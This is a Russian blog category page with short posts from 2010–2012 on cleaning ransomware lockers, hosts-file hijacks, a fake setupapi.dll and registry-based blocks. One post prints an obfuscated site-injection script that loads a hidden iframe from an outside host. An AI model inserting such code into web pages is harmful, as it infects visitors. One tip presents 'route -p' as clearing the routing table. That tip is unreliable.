Безопасность. Вирусы

Подписаться на эту рубрику по RSS

Аппетиты вирусов-вымогателей растут

Январь, 15th 2012

На страницах блога я уже не раз писал о вирусах-вымогателях - началось всё с вируса Internet Security два года назад. Потому не буду переливать из пустого в порожнее и в очередной раз подробно и в деталях рассказывать о лечении.

Однако аппетиты у них растут, конечно не у самих вирусов, а их владельцев. Очередной такой любитель быстрой наживы требует 1000 рублей за код разблокировки... действительно, чего мелочиться то.

Windows ЗАБЛОКИРОВАН. Вирус Microsoft Security  Essentials

Внимание! Вопрос к тем, кто всё ещё отправляет деньги - действительно код приходит? Впрочем, те кто читает этот пост, вряд-ли дадут ответ...

читать полностью →

Компьютер заблокирован! Windows 7

Июнь, 23rd 2011

В предыдущей статье я рассказал как избавиться от нового вируса-вымогателя, блокирующего компьютер на Windows XP. Буквально сегодня принесли ноутбук с таким-же вирусом, правда у этого аппетиты скромнее - просит не 500, а 400 рублей так называемых "штрафов".

Собственно, под Windows 7 действие вируса немного проще. По всей видимости в семерке переписать файл в системной папке C:\Windows\system32 ему не под силу. В результате алгоритм лечения немного изменился.

читать полностью →

Компьютер заблокирован! Новый вариант вымогателей

Июнь, 21st 2011

Компьютер заблокирован

Ваш компьютер заблокирован за посмотр, копирование и тиражирование видеоматериалов содержащих элементы педофилии и насилия над детьми. Для снятия блокировки Вам необходимо оплатить штраф в размере 500 рублей на номер Билайн 8-909-151-56-52. В случае оплаты суммы равной штрафу либо превышающей ее на фискальном чеке терминала буде напечатан код разблокировки. Его нужно ввести в поле в нижней чати окна и нажать кнопку "Разблокировать". После снятия блокироки Вы должны удалить все материалы содержащие элементы насилия и педофилии. Если в течении 12 часов штраф не будет оплачен, все данные на Вашем компьютере будут безвозвратно удалены, а дело будет передано в суд для разбирательства по статье 242 ч.1 УК РФ.
Перезагрузка или выключение компьютера приведет к незамедлительному удалению ВСЕХ данных, включая код операционной системы и BIOS, с невозможностью дальнейшего восстановления.

Буквально за пару дней поступило несколько пациентов с подобыми симптомами. С Первого взгляда ничего особенного - обычный блокиратор, уже не раз писал о них в разделе вирусология. Однако этот тип немного отличается от описанных ранее, например Internet Security и отличие это поганенькое.

Данный вымогатель заменяет собой системый файл userinit.exe, находящийся в каталоге C:\WINDOWS\system32\, чего не замечалось за его предшественниками.

читать полностью →

Как найти вирус на сайте

Декабрь, 25th 2010

Вирусный код с сайта:

<script language=JavaScript>
jhtm='%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E';crypo=unescape(jhtm);document.write(crypo);
</script>

Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.

Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий - вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.

читать полностью →

Не открываются сайты антивирусов

Октябрь, 30th 2010

Встретился тут один троян, запомнися тем, что проявил своё присутствие довольно интересным способом, а именно при попытке открыть любой сайт разработчиков антивирусов - DrWeb, Kaspersky, NOD32 и т.д., браузер сообщал, что такой ресурс не существут. Соотвественно ни о каких обновлениях, установленого антивирусного пакета, речь тоже не идет.

После благополучного лечения компьютера от вирусов, ситуация не меняется. В чем дело? Всё просто - вирь переписывает таблицу маршрутизации. Устраняется такая ситуация довольно просто. В командной строке (Пуск -> Выполнить -> ввести cmd) необходимо написать следующее:

route -p

Данная команда с параметром -p очищает таблицу маршрутизации от всех записей, которые не являются узловыми маршрутами (маршруты с маской подсети 255.255.255.255), сетевым маршрутом замыкания на себя (маршруты с конечной точкой 127.0.0.0 и маской подсети 255.0.0.0) или маршрутом многоадресной рассылки (маршруты с конечной точкой 224.0.0.0 и маской подсети 240.0.0.0).

После желательно перезагрузить компьютер. Заодно проверьте не прописан ли у вас в браузере прокси-сервер (если вы его не используете) и содержимое файла C:\Windows\System32\drivers\etc\hosts на наличие лишних записей.

Ваш компьютер заблокирован за рассылку спама

Октябрь, 09th 2010

internet security Ваш компьютер заблокирован за рассылку спама

На днях столкнулся с очередным вымогателем, по традиции маскирующийся под систему безопасности Internet Security (ну хоть бы название какое иное выдумали). На этот раз назвать данное творение вирусом язык не поворачивается, хотя обычному пользователю нервов потратить может массу. Особенно актуально для любителей социальной сети ВКОНТАКТЕ. Каюсь, сам по началу не мог понять в чем дело.

Суть действий - при попытке просмотра любого сайта, вместо ожидаемой странички вылазит картинка следующего содержания:

Internet Security Запрашиваемый URL адрес не может быть предоставлен. Ваш компьютер заблокирован за рассылку спама. Вы можете разблокировать свой компьютер, для этого перейдите на сайт ВКонтакте и активируйте свою анкету. После чего Вы сможе пользоваться всей сетью.

Итак, как таковым вирусом данный вымогатель не является. Он изменяет файл:

C:\Windows\System32\drivers\etc\hosts

читать полностью →

Пропал звук в Интернет. Flash без звука или setupapi.dll

Октябрь, 03rd 2010

Сегодня попросили решить такую проблему - при просмотре любого видео в Интернет, например с YouTube, изображение идет без сопровождения звука. Причем на самом компьютере звук есть - музыка, фильмы, игры идут без проблем со звуком. Проблема не решается не переустановкой flash плейера, не сменой браузера. Более того IE вообще отказывается запускаться.

Виновником такого поведения оказался вирус. Куда копать подсказал браузер Opera, выдав сообщение об ошибке при обращении к библиотеке setupapi.dll. Как известно, в каждой Windows системе есть системная библиотека C:/Windows/system32/setupapi.dll. Под неё и маскируется вирус, копируя себя в папки всех установленых браузеров с таким именем.

Чтобы восстановить нормальное воспроизведение видео со звуком в Internet достаточно удалить с компьютера все файлы setupapi.dll, кроме C:/Windows/system32/setupapi.dll. Найти их можно поиском, не забыв включить в него скрытые и системные файлы.

После всё же рекомендую проверить компьютер свежим антивирусом. Обычно единственным вирусом дело не обходится. Flash player кстати можно не переставлять.

Вместо рабочего стола загружается проводник!

Сентябрь, 02nd 2010

В продолжение серии статей о вирусах и последcвиях борьбы с ними, хочу рассказать что делать, если вместо рабочего стола Windows вы видите пустой экран или загружается проводник.

Рассмотрим случай, когда после загрузки видим пустой рабочий стол, без меню Пуск, значков и т.д. - одни обои, если они были. Для начала пробуем запустить рабочий стол вручную. Жмем три волшебных кнопки Ctrl+Alt+Del для вызова диспетчера задач (подразумевается, что он не заблокирован. В противном случае читайте как разблокировать диспетчер задач вручную или с помошью утилиты AVZ.)

В Диспетчере задач идем Файл -> Новая задача (Выполнить...) и там пишем explorer.exe или просто explorer. Как известно это не только проводник, но также является рабочим столом Windows.

читать полностью →

Синий экран смерти (BSOD) или DrWeb Spyder

Август, 30th 2010

Сегодняшний день начался крайне неудачно - на нескольких рабочих станциях во время загрузки появился синий экран смерти (BSOD). Перезагрузка проблему не решала. Видимо мне повезло ощутить на себе действие пословицы про тяжелый день понедельник.

При тщательном обследовании системы был выявлен виновник BSOD - spyder.sys (5.00.1.04160) из состава антивирусного пакета DrWeb. Опишу ситуацию подробнее - именно сегодня закончилась лицензия на DrWeb, т.е. истек срок действия лицензионного ключа. На всех рабочих станциях, где появились проблемы с загрузкой BSOD была установлена 5-ая версия антивируса DrWeb. Вот такой сюрприз приготовили разработчики, как впоследствии выяснилось, подобной проблеме была подвержена и версия 4.44 (форум поддержки DrWeb). Хотелось бы заметить, что на 64-х разрядной версии данная беда не проявилась, так же как и на текущей на данный момент 6-ой версии антивируса DrWeb.

читать полностью →

Диспетчер задач отключен администратором. Win32.Sector.21

Август, 25th 2010

Диспетчер задач отключен администратором

В своих заметках, я уже не раз рассказывал о том, как исправить блокировки компьютера (диспетчер задач, редактор реестра) посредством утилиты AVZ. Сегодня хочу немного приоткрыть тайну, как это сделать простым редактированием реестра.

Для начала требуется загрузиться с LiveCD, флешки с WinPE, подсоединить винчестер к другому компьютеру - в общем главное, не грузиться с него самого, т.к. смысла в этом никакого. Далее запускаете редактор реестра, подключаем к нему необходимую нам ветку HKEY_CURRENT_USER. Данной ветке реестра соответствует файл NTUSER.DAT в соответствующем каталоге пользователя.

Избавляемся от блокировки диспетчера задач

Изменяем значение параметра DisableTaskMgr в разделе [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] со значения 1 на 0, либо вообще удаляем данный параметр.

В паре с этим параметром в 99% случаях там же вы найдете параметр DisableRegistryTools, отключающий редактор реестра. Соответственно меняете его значение на 0 или удаляете.

читать полностью →